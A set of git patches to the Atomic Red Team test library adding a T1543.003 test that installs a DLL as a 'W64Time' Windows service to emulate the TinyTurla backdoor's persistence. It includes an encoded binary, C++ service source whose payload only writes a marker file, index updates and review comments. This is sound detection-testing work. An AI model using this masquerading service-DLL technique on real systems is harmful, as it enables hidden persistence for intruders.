zl@IS}Q&C<`^CP$#aqQa2yNzuf?xWsU2CGR1&w2UPIWIpB>EH$@dx|KHW|jko6*1A^ zriPASHp;TiRYbir5JYq_{7W%ji9iHJm^cnnf<4am3_7sbM?5c4aMT! 
zIksgK+Y4p66RY}^vQPGwa5x5gsjEPcZN!&w#9@g<>DJK@UwlPdwI|2XhGOQ-!wHe> z_-O`+0CAzsw1}b0xOsTA-Py}_R$l0F*BYd0L8hsV{(`Q}s#{H1{$k2_45qzjuu_Ts zq)YwnaS-|P%YGGwz*?^=sA^igC)gl2cwuaM5Qi%mzuf0@|6n+l0<61Zd3U6JcO36f z7nM`<|Hu^_X}YNq<$yAn1WMKk40A2rk@7wn<{!_%!L-)ioRFjTG9P1~=F=lbz5Nr~ z*@XAG(pva-)8U?Dpuc|HlIo9jk8>!D9T`Yz+{+ml*X4b^8B_xP2W}Pot+yw`pLRg_ z{nNmEIl7~lcL6CU)({Rx7WuRRTu-&GG7!Sa?x#Gra}~u`6xNEuv(t<4AXZVhe2A>_ z^6LRcak>vE4zVL#j5zI_>LtM~@TGjsZa<@Rh;P*gwM(ie58iG^rm4s!f$F-!+vzw! z8r~26A_uHP$OL`LkTvN!iI|Imff^f$g}Hi3ptcLfA%t8pR#`AVSJSdk z(6bt&E#zKpp^j$cL`wl{( zc3;^21_CyNk{NaCw|fEs&n=K*?j97;ClCgQx4CaY2@E%Yz{z20^RJzCLCix?>;*nVm90dp^P}N)j58| zG*8(30+4uGjzpv0<^C;hT;??h!yS8CxQC8m?_XLl?0ax5#12IV?e*sCbMj%be96ou z=r)jYk)47MZ*nlmWb<|qLE2eZImZ~tSF~9hh}g=}g3Qx$7l=o_f5v8CXy2^ha4vZI zAC#Qt1UpX%d00I2=_1aY+d==XXPQC^yzVa-- zu+ExcK9kQrZmkH0mUi)}xL>uClEZ47Gi8z^sKIhskAcNvVG|bj}sgT|U(oyfLIN2@*jW@98 z5cNJO_nBZ%N0SijPSw+T+#uFd!4(-eKeD^S9 zGO!?2beKMY+dQ7{xe?P=Tv|R)tAz*ZA;n<@;6^W5?ba7-XMJ`hQg>S@-80r~!QsyySb2TMY>tZ;Zj{%Fn4GEvAB& zQXm^@>5M@Znh&z%GYj_^Xkpx_Mx2jvY9Bn%wI#1!pD_)GKDdQFldt923+ZkYck+=Qxinf5#-#DlEM@Ise=m>;2$Goc&_jM&Tr z?F+`Cy?v80RYhka^_npZEVQF#-Os85eGX?D*8mxEdMtNZAXr zJ%qEa@H_PGSZFMJn*nxEnEd%r-(^uRpWmhgrm&PzhMmxlO2ffNbpx9Z=tpyrJfY~i zF_6fiRt|gx6=!GM9uNj5=JVr;sn5qLJnz${4dy7rwm8V*0bQZ$dGuvoL6#-_QSZ}M ziThQFHmFRIZQc!~M!okSeKj~+q0%44CZlI{o!k&ZR@A%3!Z6m(5t%VpXoC1G9(aIL zE~y9JUy~^AePr05jr}7FH`d*t%92@yJAy-vviiaomJR4v_Upn=8u5ClGQ|xE9V3K- zH|>22oEar^DKLz;HRBC@kMtAtJCSspHd69{Dk>1AOIPGsjiZf}$D^VRh=U!Ffj7WT z%m!a`g-HZ>u4;_;llk z#*7`2BFuYsrK7S7L7^=dZX9#N^qex|NhJj;8#TAY-n<8xuhi5;$34p}>&>e<*Ocz`+9lEu8#A;5!0e7Wkw< zh39Sw-y|?1@Ej@oBMCPNbPH7V8Ytnx0+k#*5*{Y-V1ZtNhY1`mP|58m2|w@=Yj>N# z9|&v_xJ+QJz>5Ty2|P>SXo1HI^a>mx@Dn@|8O`kw_&b3w2;464VS#rF{Gq_Gz{>ASHp61X2=6NgySG zlmt=|NJ$_ifs_PN5=coPC4rO#z9I?4-#-}LlMJOJJ@-?eyhuA)wp3h70x1ckB#@Fo zN&+bfq$H4%KuQ8B38W;Dl0ZrVDGB^nN(isRONHm}o{ zypra}*VyFHB~GIH({VOk?)tUk0qLTRuB|w#i}QInxYvxci0klx?oYmv6m?ShCZ!iC zOOJXF!jn#28BCr(vH?7pAEb4qn>4=>*@OI1@0DPguCBB4t_T8a%+3L>5W$N8}^j 
zW^>=ASHqScO}512dUrxH3_u(T+KW^lKQ12kdi=30x1ckB#@FoN&^2W3Cu06uUh0F zmVZ5kLBlcEo*zSC)6Y8ZOV+=SZX7~r%InI zAO5nedj$Va|JWA!%m0e%Gqmu}q`Bh37obVr!HbDM0L z&MjJ6SzA{*&-NkI2lcc2e5F6?hWD-3J%V5B56?NtZ_feJn|n6gVMBdWZJ@S(2{76G z-&+3V+Q-H|mY;k6f(2F;-7wexa|HSXkP#&A7Dt*jG*oVK3);)q>>(93D);`jk zd%kmYr-?qZz+uC*FK189eJpQ}FXxswRW8LiLtW=C3|2PIr=Z&LM|o<~6+gB;?X&Rb zASoSx@Ar`&QT-=>wtZz;{O>RAxl^i_&23QqAKcir!NvFzAmejmy^W?#8b7DJv3_A==(+N#F- zruqc|-^|*kU}c?eS|B*Twtmi-{4rzZOsZeJIJl%Xuwu^4Npq&x*ViHcGz3SVI%;e_ z{-2S5+ML=YRdvDn)pM3Fu3lWXCm8#@u7@Z;mzz_lxl_s4YQSKwE*h znTVaEO-D*S$}0TRtk}`osoE%QEXpf*212JHcP+|SAvbAM<9<1CR^zW8T=iDJ&ec9n zuq_qNYk|*)P$Oy{6r4-I<#7o`ngWfrOBVV9_4U5G`XvivX}c}ESlWYKR8_`?{hDvF zvZIBTeV#Z>+0$t2I@hc2AGh$mX2rjFsEWVIN`Jz-f621%zgqY8mi^vf#n)MMTC8h~ z@ooYcOB8=Mb!s=vzQIuj_F6P``rKKkpE|vEarLOca%*CvS7YAkThLg)*cYg&_7w%{ z7uQz#rdH4QO|Pz8Jc{3~mESCUD(h6}zgFaJ$KvBcjrB_cc_;a*D(mV{s2(kKaYJB* zPsu-??`v!?ok_)sIzs<9+e;Jdx=}1YZo!U9^$WpkQt9X%5Z^jS zmEV1_y5`MQ*K+H+&bqc+SC>VASLfffKxNe;^a7Y|%$F9jw6d|5(+uBMBZVJ`~h>wk#oH|O)udb@AY_u3hGp~+is;XbIl%L84YF5fwsG+_VU*c`_ zB^Ivq&97aspt=!-k{}tC8S^>GYo0u|2&kF@@b{qKw3yBaWGe%ezQBrxYF`a?R4Ib5 zM1KH*pq5OAASN$>ULgqTk?cxUD(g=6t*8(BnxLe*`M$+i924y~)dw4^MCSCCLQ*Qt zyUGU29@Y`4_RXseunf?jUEheoOXcE*y6W*hU*@2JRW+53zAE1YUtX>61YiF0v(G-M zFmuqPn#v^$rN<)P`uWx1#pY`T1Y1|WO+Pf>>cTahs<&Md0(Q7t}YRIsr?>#ze z(b>Spkz5cwRfERyTCRBQkqGC4R@a{`2M$J;R4$IKq}uUi_49*pT2t&K$ZI4=0+zte z#^Om3S~@;=zHg+@G0;_diTO8-mSMd?Yfx@GI0rkqqsGkk;okO})s?pMw6$s36703Q zksfN^3T5Xp2Zgp6qu0e3FyfmaFsK-pJV&Ze4B0R6T9SZRtTRK}nWLmY21CthiUYR(c+%XSESpSB2NoeOI(v zX`=T?@EmsM*r|&b%(h;nf3{65Wptu>1rp zKmW>4zw)!M{NyWtoCi&Xf0%-nI~h4ktUSfYH6Jau&PLqnS_#iltBnMeCctGvbtL=` zy-qb^2p1w&jlxzSrVf}#${#uC4tFI|I4dIdv6#Je&N;Pu;rR{KOU|oaQL=m%c*6Y! z!Rp2pGb=H6P*K7u;wM3U)yOFK)3oz3o1CuA(uz>u5=dnhcwHtEBAqF?Q?t6R^Gwbb zFW+Q$=?Q%!HH3)CUUw%EV4QZN*zrOrPleGDB){A^3`&A%+ zKP$nR-|Qy8jYDXFH~Y80ylw>DcxffCav-a4;Iwf&ujF;PBhRe}@5Wz#FY`QGTbM;j(V~T_3CG! 
z6JAE~XX7W|{Mq>{y2)?1N#@;mTbia{nx>@gn5+WJh5dXul>tMI2mumY144>LpsTRc3!4c zz-HGWAJ+7fWle}@j1}=Pl(9heSIOmq7&(GZO zM(%d%pm;ntY~~b=nmTH_>>L)Cmd;sz`l)k@tLFt5&aw9q8|KebG>^rFf7HS;Dk=q2 z66jR|ZPq?`uNhMrQW8i>K%14V&XuG@k&-|%3Ahe+=N^3gP}fn~fQJ5@pyB7rcIRdv ze=y>PGz{)3?kIQeQO9Q^->`w%YE zWsnS?$DQjrevs>UtzSc$&9fDElrt_F-E8-1*<%lOozk0}la=iu?pTLRhfh%Ywc`dH z?2@yZPCXy%q@PTu$>NgHPo{%p`I5z1Wsh<4V&zM)kz}$>7MF}hvU+?Oo-G=-Y(=I$ z#3j@t8Qo;{uy{V!*~XI9t&efTt$ewbjT|@3rTw9qqwtD%agj-pZ8IlXd1y2C{*=q& zXQY##WOB9I%1CEhKG=QQ!DENI66DZVz9%R<9_`?1IVT?Y4L?WupT=WE=hf5ANl{v%OX{S248 z@s~CI?rg`3Gtf!mPi#MRqQfWnY@aZ}U2^cG zp{^NL8tveDRN%+T4qiv_cT%5QQJ+IK?MLZpbF{p)SKZoiY2U`*q4+yGN&ReJbDG1~ z+-Un6t8LhRi1i#^s`PuTB~xerYp3Np(qeuq2`<}yY~L+%Ow#tiW64pIvR$JcJjQ(G z1m%M#IApfl=06E8o2G3yLNkf(Z2csR-41oT5AAobYq-;=B=b>8@C~1+#-JruS?cea z@1gOD{t9kJ@DBVvj6bda(0ostmY1KFmX>}WBGO#V6^OvmucGv{Gt<`(OjC!~yVz={ zcAu;cwvCN**wLYD(zLB2v%F&v9D%>|p}RqGltzC5y7#56NK0={!{NSOX(scDN#v2V zA4{gM9^w*wdmr`CXZ>5g!?ttF_D?%*>``dX%D2(>Gem#!IYvTX&_lhGNy-lI zBn$ep=fh;6;$>Wf6T5x~;;-zo32mdV`n34%m2R>&l#E7_INRsjG^GAltNP<2^&i%$ z9P|8B^5lJni_4(T&r&|WA?*Vtvrg?M8J*Kn5OOYL`R;s1GW{%3<(hgbmsIXa^pAWp z-W*}IUE!lseI?EsTO8#aTO=FjB%v{Epi3M0T}`9hPFjnq=8XX?z+c+X-AZivX$`RV z{^**=q?Nmv|90H-I?uXJ#5L2UW%6p_bEUhqbl%%nJO5CZHk9$6{+efchUPhSfaV!9 zxPtXK)}5xg1N}AM-7c*Vf9t@7!~=AWa}DUH4VZ{IYrbUBjvbP&4f&sR%?+HpQTBEG z?Y7Gk@BD!h_W|PfIOG2`NMqdR{IlbMGFcpPCX`3M&a|YyVEfo~I90gq-5XrmU+`BG ziPxoboRpbo$?E@W?`*)My2?C$?j)f=Qw@j;_G?>U;T2mG+>vnyHkdzT9jVW2iLZa^h0#1#!6ju(ayHo zWwqA*y>rhb0}X|MJddk0&-3T^-gD1+?>X-|_uPBKoIAoXI=0L=@9AQji|WLgnrp1~ z%JiL!`8bIw>FzQk`+rtOuc2;78Tv2x$@Skj7W$8Fu=2{@4PQ4@KPnq<<-HU874#v! 
zE#-4%2RYtQfCLpSCPHb zmJQ@Z{CjMgF=4ct;2WzZ)QwRSDzO)paU|NLV>C&}dINnR?)Q9``*@_@W3woEb90U4 z?P6PVQs`_I^1VQKUNlNGV+Tg3NA*)%x6A=j-_Cc*k;q?GBF{savFXwMqdeIpbCevJ<2wddHh!7(+?P~#eOU8IjB=CUn(`54N6sk7{t zw#01FVaHmwe32SsOi(h%%4e{gj?-Yd(jrxAJgG`@`Eth}Tdc-bj#6W%N{>_inC(gL z<@oDu4vCLTGVsazyja^7ta;9}^wzIm?mzo9d*GoUO_aE>`7< zMXKDlP?cA@Rk^W1$upn$_Sh^());(_vGnZV81(Q=C!a}^Z0aoI&TM{{9+%dh!oP(G z{Ov~IIi3yW)AuEP66J+LzE87X(!b0TA{y=^-<^?9?)xDVv1f5k=6}lAknaG=CqLgr z=Cxx#x$iFJ=ev~o`q<9~uHo{D4pT2VQpa)Xoc+EI`}6&OPx}&oxzB|U2-uzNuY5z5Jj5Ua4n3Y2VlMy!Cx$885jpl20in+v5L9JO9W>UZ|4y zk^P0wPy|vRKYCr$70#-qtnD|m?`Sc3M~i8_qs0|Z_*|}&C@0H7kIhW6;f^!-ZkdzJ zFZGh8-@{}ds@UJSHC&vX! z&;h=%o`IKKWvCSCF1Q}8`vUJXgS)0vmbEGUA2U?V47SM=h0mfSixD!g}U=3LOw}{1Lz?BGw{aQh6>@Q9rmJi)S(|{kfOcnT0=R| z5s3qgqBioh!(Mb4pZzd{LgZ1kv;*xWPZTCmF>&sN1F}te2HNLPZ~Qyp7Sx8HG`w~$ z?ZQtK{^2@~OPoFP4D}3B?UaS~`5gOJ%EEh4JL}qd;bRM^4{cG`8)_BWOa3G*b@N?l z(jD+V^xHMm8NP+qk*91S-|IoE=ob%s1O>3u(6@*>Q_oKLDr)--`4=1NlPHNDg-@Ui zb{dw~aa?Q{ybE=5tR(zB3SgHlp^s1nd3s^_QsRK^hD&asA30VMK8@87I`! 
z4wI;#_V&ZXjf@9rJ6wAcZ6{AZeE-J{HA7+xZ$wGbqwo;gNqX5Q4D}Caog5dgLIz24GJUF(kiz8L>q!>?quW`fei+d^NzBz;*=<^?BqbR!LZLGkq;Fhwlr~r)x=v zcQrGX$e)HP%yA{2(1k9eK5p19+t{6OFDk|!fD;G4E%fxezAMu^j2bp?SU_$BluS< zh!rX&&I7Q#jk=M?1#d@v)GY}+R#H!CFRZ?WF@PO~Pa-$<8Gz&dkr;A5+TlXvqdp$E z9#!H$3HPBk>32A072|vr`QZX|7~2E8BppBf(DoVP$UI<&UQ|wcJG^)`?d7;`_yh_u z{s&;?t&DH#?}i6}esq{TY536RXbXNauzD?PYossWf1m_; z)aO|jgAURbdxxQZg6gr$?jTm{h$rn$!)ENL27d5f{7^RsY((?0qwuY-Fm9+r z=3fl;fq%spb`++On{zM&=Oj5t@G}7CchPs)z3_F^F2~wT{Lw+ihP~TRn^7&-h%~&a zhj|j)4Ie~qNr%5d_1NluLoGrc>?r&JnuzU4;ah~AgioLj?ELjbvi4}y*N6k_kA!EV z4($B(RI=9U9@I@);U=_8{J`8gs{FN2vIZ)*UP@TIm2(rH!ujYjY@r9au!YZ|I&9ZA z#tiDl?t~Ac`>^}rn`k?B*>*$CMZ2&)u>Jw&L+m8Hb_e4byB&TNrLoiS><78Wz_!CJ zXx`nV!?9myo+sS{Uq_=!w?D+(_%LG(yBD6dlQ~(^;apUQ?SWrLostJWg{r@ZPf34- z{9?nOpn2FCc*~=d#qNdU|Bd5P)&W0>&Lcev??Mx>lQ4}cu?OJq&mg({TPSu8-JJ_&7>Q zIxKpE^Bvm`uR%VJ<%R(i!j8hb&^qiS{5IMk^?{?Fq#v=%;52kQwi`Zc&pOAEE@d`WDx2vMA9n;=#6LZpqub?{Y-aU-Zr?^&O=dT5lbwc&uA^jd(mND#d?0#tf zE_IXq@TaH)I|Cp2cj8Zd)c1%b3Xt9odr&)e^l5Aq5I=DJGo1U_Y4~$gi=Bb%o+YM| z2Y&zioKx8Lw4uI^>ahpl`X6w+CyMMK?&HcB421NCC3Ve1bWGm;J;MSYSEZ{E+C#_ojs(0=R;ocbfKQ`m0! ziv#pG_P|TrZ~TODzMg)Ep`S8lu+wn$%d`>O@pD6c_#pAYZillE(H?B|C+2xH5!((g zMRv*mZkwt@dzfQAuopd#orb?d)8t;g%%&!zT5NgUL_O-|x)X&DqjKytd=pj5^=O<; zeH4{)J#|4JI>3A$h4-R~TnmzL4?2P^Yi1827xSmAzZ^TBV{%T(`bt?-IRjhhLeDH{)oTgc!IYHB=d01I~_G#|Y?9yDT8Poifrc1M2vrO}iKUwX6 zS@UVlM>V@OJ2h|797)^HMBayfYt{P=&FR0hwpVNJ)+~O*O0U&ir}?zzdH-YW_i1j| zd|A_e#MK8S2Lq|)gP>Ut(w1h-P-QfY|y+w^TpS! 
z{Tno2)8q9+y8X2}y;L*(-&Xz|ns;l4HAA}GyI!^ORcOxD3~Ao2xm|NWvovFs^JwnW zRNDUn%`?&WXTs;*Z(8lyqZ!q_Nprg92Q**Q{kBW9Tk|WLotj&9ew*f*sQYj}59{L( zx9`u9w&pD>USHMxhUPxa0nIlwm7X_BH79CTYPvMtnw}hW`AaoFpgCG|w&rVpwCZzE zbHCp(NN;|;V9(|DKu){-XzaecuY5ViiLiFjhSIB#4 zDBpUnYXOdNyiei!Y{jN$5dJ{@Sk3583#I-e5f8 zkLh=f%u2*UwcfCgAG(*H@qNv<*q_k5_)X+Q3qKNGRlT&zJ?FzyuaH-i@XNzar^DoT zmX`AV-g@6c$sx7K>!SXJ+?nOQAm@0A>p zmV_B;GGqLRy)-S@7B|qn^DtArQQmKBhIqI4+)kUEmo6{Rw;awRw!;!{FxYgAd z@%bBD6L|~V7uL+Qj&3V<2E#7iMPOxdRaY-D=QqTOqCeqsSq+xVwN*7$`FkV+Q%Dn1 zgX#}w?W$~4K341`CVyV1S4te?fnd|A`K{8G%~tR+E2fR!6Zu+9C(tcUgRx47Jk3vrC*Sg1$sxnEmElGSnPz zKSN}$IhQJ2DWg00LWGliA;cUR|9HPcM*j%QF41N8(sF--n9$YM+bvG=;1V3(aWWW9 z>hX(WXFS@HI0aW#Rkhhs_e;xz4CWD5Mgl40I2%m0q{!)S@HQ?Vsh>GCO3no7(`SiH zG!Z)u7uOd%qo?Pgo_3sOB~+YtG_)|Wj4-A$y6UsD>u!35>FbmnNHiS|Imf)Tg zel2Hxn2GRI>Y_U~ll2h{pN@}TWqo*Cy}{7PYr?E8bHW@($LaOUBCcHS@aeVW`mB%B zYsnvp#+)!$fUDW9F&8Dp^4;g}*L?Ya_YTbx;K#M8)pxnwhqR9Vx=0`bFy zcFKPAbo810`T2w|yUESWJ8aIzkl#Br0iCd<+;P;`nhUa5wCp*Xy$2ZVmXSCZU*b#z z{Ua%wojI50hCt*5?+D7?mEHhT?viSZnW ztZ4RzSB`k%woYrgrvISG$zA$8-ziUB>KMGKsZ#S7FP-I{Qt7D9K7{;}JS#NFYu$!k z&&GoSu4kxbe{*AWrBYXm)f{Q{tBaIr(zQd+3}$0Qa$Nkjbf2Hjj;vICkAGHMTU{U) zSy9v0=#M6Xk?ac@O-Y^|^EUhSBU7dP%nPYzJnC-@Ht|xjfb}fJTf2u%=P|;1bWxY+ zqYu8#%G5_ULp+};buRlGTVgSPIPYmkoi|)6?FlFRZ3%v8!ZceOV+nc8nIG}Bg#5F4 zN7@4Fdjog2$L_P*aD$qX+cPiX_00=5#JsVU@+`P?)}kc~>gLR^8H{^=iaEvVi&leo zakY9wL7y4*N@#etRBB2Ik>q(#ekt0V6-!h%EL-G{Mq&w7ZJ1mW=n#3?n#u5L^2f|* zBuEQladlI1Q)4I+_bU}FZpw~orEV^6qC}%wo@F!=SF4Mgb6ff-yg?N=R^O{!&GCjHF$X7YD}imdIWZ7&cqu(HMQ)#LnwV zBq+f!hfwzwnM@|j{ZVfsAm#eljz>emgii34tZ0mD|1H!@-Ye(J&HLEp^M=h*>Cn-_^JZ;8&<@vI3aV$3N&mpw~^u|$hEv?RPD z7^Y7BB}>BAwBQ@81Lq|{Q0mqa{@!xj-S)gTx?_<>e>|?fT2hybUM@+kqt$vN5}WPk z&o(iCuJwzG7q<9gE8YHBQzXW`-AF51%qBvmWt-jB2S6JDAeox@A{Zcw*LiZ%V@rWkdzq|M`Hmo@UoAEg!+Q8-#9 z(>G6vV$bGuQ|d{{r<)?FO8u-vhcnv@ewoXVoO+s4eYyNqJ|Er92)eFj(Sn+JxxZEo z|JThzY9RuJ2oxf4`VlbB=;!VAJEMoQoWK2`g_Pq)U`g50zoUKZcIUXG_g{a4?c*M( zu;c$h1Xw#kEm8Z?m1SK8365dX$MAbCwd{*dDN_0Gi9fo0VJjDb8P2xmkiC^hMIOno 
zo;>9W$7H)d%>TFr!^^IoyrgdS<^n6{&KNBxe#j=+P59z61(a@*7@$_A2s$s@^Wo7y(@ZQ8qO|E9LCyPvU74;UU25~_&6&+d zHuv41zJLGyZCl#6bZqI|qN1$NB2UMbzO5?Bx+&~VYItN*MVDuD@8+^@Pj_#(>T&dV ddX&9LO<=!DmL=^;N79v)jl!o8fxqqu{2z7pEtLQO literal 0 HcmV?d00001 diff --git a/atomics/T1543.003/src/W64Time.cpp b/atomics/T1543.003/src/W64Time.cpp new file mode 100644 index 00000000..b6c73e03 --- /dev/null +++ b/atomics/T1543.003/src/W64Time.cpp 
@@ -0,0 +1,98 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "pch.h"
+#include
+#include
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+ DWORD ul_reason_for_call,
+ LPVOID lpReserved
+ )
+{
+ switch (ul_reason_for_call)
+ {
+ case DLL_PROCESS_ATTACH:
+ case DLL_THREAD_ATTACH:
+ case DLL_THREAD_DETACH:
+ case DLL_PROCESS_DETACH:
+ break;
+ }
+ return TRUE;
+}
+
+SERVICE_STATUS_HANDLE SvcStatusH;
+
+//Initialize Service_Status Structure serviceType and CurrentState values
+SERVICE_STATUS SvcStatusS =
+{
+ //dwServiceType
+ SERVICE_WIN32_SHARE_PROCESS,
+ //dwCurrentState
+ SERVICE_START_PENDING,
+ //dwControlsAccepted
+ SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN | SERVICE_ACCEPT_PAUSE_CONTINUE
+};
+
+
+DWORD WINAPI SvcCtrlHandler(
+ DWORD dwControl,
+ DWORD dwEventType,
+ LPVOID lpEventData,
+ LPVOID lpContext
+)
+{
+ // Handle the requested control code.
+
+ switch (dwControl)
+ {
+ case SERVICE_CONTROL_STOP: //Notifies Service it should stop. Should only return "NO_ERROR". Same action as Service Control Shutdown
+ case SERVICE_CONTROL_SHUTDOWN: //Notifies a service that the system is shutting down so the service can perform cleanup tasks.
+ //Manually set state to "SERVICE_STOPPED" After cleanup commands are run (none in this case)
+ SvcStatusS.dwCurrentState = SERVICE_STOPPED;
+ break;
+ case SERVICE_CONTROL_PAUSE: //Notifies a service that it should pause.
+ SvcStatusS.dwCurrentState = SERVICE_PAUSED;
+ break;
+ case SERVICE_CONTROL_CONTINUE://Notifies a service that it should Continue after pause.
+ SvcStatusS.dwCurrentState = SERVICE_RUNNING;
+ break;
+ case SERVICE_CONTROL_INTERROGATE:
+ break;
+ default:
+ break;
+ };
+
+ SetServiceStatus(SvcStatusH, &SvcStatusS);
+
+ return NO_ERROR;
+}
+
+VOID main_payload() {
+ using namespace std;
+ ofstream myfile;
+ myfile.open("C:\\ART_W64Time.txt");
+ myfile << "Hello from the Atomic Red Team.\n";
+ myfile.close();
+ return;
+}
+
+extern "C" __declspec(dllexport) VOID WINAPI ServiceMain(DWORD dwArgc, LPCWSTR * lpszArgv)
+{
+
+ SvcStatusH = RegisterServiceCtrlHandlerEx(
+ L"W64Time",
+ SvcCtrlHandler,
+ nullptr
+ );
+
+ if (!SvcStatusH)
+ {
+ return;
+ }
+ // Report initial status to the SCM
+
+ SvcStatusS.dwCurrentState = SERVICE_RUNNING;
+
+ SetServiceStatus(SvcStatusH, &SvcStatusS);
+ main_payload();
+
+}
From aeaded3b083ddaf23398b64f38282b5691054b91 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 2 Feb 2022 16:27:51 +0000 Subject: [PATCH 3/4] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1543.003/T1543.003.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+)
diff --git a/atomics/T1543.003/T1543.003.yaml b/atomics/T1543.003/T1543.003.yaml
index 338b07ac..5e1f6018 100644
--- a/atomics/T1543.003/T1543.003.yaml
+++ b/atomics/T1543.003/T1543.003.yaml
@@ -92,6 +92,7 @@ atomic_tests:
 try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} catch {}
 - name: TinyTurla backdoor service w64time
+ auto_generated_guid: ef0581fd-528e-4662-87bc-4c2affb86940
 description: |
 It's running Dll as service to emulate the tine turla backdoor
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 7aff52be..f27565b5 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -850,3 +850,4 @@ c510d25b-1667-467d-8331-a56d3e9bc4ff
 deecd55f-afe0-4a62-9fba-4d1ba2deb321
 d239772b-88e2-4a2e-8473-897503401bcc
 eb8da98a-2e16-4551-b3dd-83de49baa14c
+ef0581fd-528e-4662-87bc-4c2affb86940
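Review bot: The two `#include` lines after `#include "pch.h"` name no header as the patch renders here (the angle-bracketed names were likely lost in transit); given the `DllMain`/`SetServiceStatus` calls and `std::ofstream`, they should read `#include <windows.h>` and `#include <fstream>`, which is worth confirming against the committed file. In `ServiceMain`, the service name passed to `RegisterServiceCtrlHandlerEx` is hard-coded as `L"W64Time"` although the SCM already hands it over as `lpszArgv[0]`; registering with `dwArgc >= 1 ? lpszArgv[0] : L"W64Time"` keeps the DLL in step with whatever name the YAML's `sc create` uses. Neither `SetServiceStatus` call is checked and `main_payload` never tests whether `C:\\ART_W64Time.txt` actually opened, so a failed marker write is indistinguishable from success for anyone validating the test; an `if (!myfile) return;` after the `open` would at least make the failure explicit. The file header comment `// dllmain.cpp : Defines the entry point for the DLL application.` is the Visual Studio template text and should instead state that this is the svchost-hosted service DLL for the T1543.003 TinyTurla atomic, whose only action is writing that marker file.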
From 454ad2308db382b4276ee290ec6afb22b2fb434e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 2 Feb 2022 16:27:57 +0000 Subject: [PATCH 4/4] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 60 +++++++++++++++++++ atomics/T1543.003/T1543.003.md | 51 ++++++++++++++++ 6 files changed, 119 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 7763acf2..62af702d 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -266,6 +266,7 @@ privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscrip privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt privilege-escalation,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt privilege-escalation,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell +privilege-escalation,T1543.003,Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt privilege-escalation,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell privilege-escalation,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell 
@@ -699,6 +700,7 @@ persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Pe persistence,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt persistence,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell +persistence,T1543.003,Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 0c26c68d..e924ef6c 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -171,6 +171,7 @@ privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscrip privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt privilege-escalation,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt privilege-escalation,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell +privilege-escalation,T1543.003,Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt privilege-escalation,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell privilege-escalation,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell 
